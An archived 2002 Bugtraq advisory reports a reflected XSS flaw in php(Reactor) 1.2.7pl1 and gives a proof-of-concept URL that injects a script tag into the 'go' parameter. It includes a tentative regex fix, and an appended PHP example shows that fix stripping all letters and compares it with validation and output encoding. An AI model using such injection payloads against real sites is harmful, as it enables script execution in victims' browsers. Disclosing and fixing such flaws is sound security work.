Bugtraq mailing list archives

XSS bug in php(Reactor)
From: Arab VieruZ <arabviersus () hotmail com>
Date: 10 Oct 2002 12:43:11 -0000



Vulnerable systems:
1.2.7pl1

Exploit:
forums/browse.php?fid=3&tid=46&go=<scri*pt>JavaScript:alert('Hi');</scri*pt>

(without "*")

Solution:
I thought of this, but I am not sure.

Open browse.php and add this code at line 52:

$go = HTMLSpecialChars($go);
$go = PREG_Replace("/[A-Z&.;:()~! () #$%^''*\{\}\/]/i", "", $go);

----------------------------------
Arab Vieruz

thanx
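
An added example, not part of the original post and not php(Reactor) code: it runs the two proposed lines over a few values next to allow-list validation and output encoding for the go parameter. That go should hold only digits is an assumption, and the sample values are constructed except for the string quoted in the post.

```php
<?php
// Added illustration, not php(Reactor) code. The parameter name "go" is from
// the post; that it should hold only digits is an assumption made here.

// The two lines proposed in the post, wrapped in a function for testing.
function posted_filter(string $go): string
{
    $go = htmlspecialchars($go);
    return preg_replace("/[A-Z&.;:()~! () #$%^''*\{\}\/]/i", "", $go);
}

// Allow-list validation: accept only the expected shape (assumed: 1-10
// digits) and reject anything else instead of trying to strip bad characters.
function validate_go(string $go): ?string
{
    return preg_match('/\A[0-9]{1,10}\z/', $go) === 1 ? $go : null;
}

// Output encoding: escape at the point where the value is written into HTML,
// with the quote flags and charset stated explicitly.
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample values; the last one is the string quoted in the post.
$samples = [
    '46',
    'next page',
    "<script>JavaScript:alert('Hi');</script>",
];

foreach ($samples as $raw) {
    echo 'raw:           ', var_export($raw, true), "\n";
    echo 'posted filter: ', var_export(posted_filter($raw), true), "\n";
    echo 'validated:     ', var_export(validate_go($raw), true), "\n";
    echo 'html encoded:  ', var_export(html_out($raw), true), "\n\n";
}
```

Because the character class is matched case-insensitively, the posted filter deletes every letter, so ordinary text values are emptied along with markup. Validating against the expected shape and encoding at output keep legitimate values intact.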



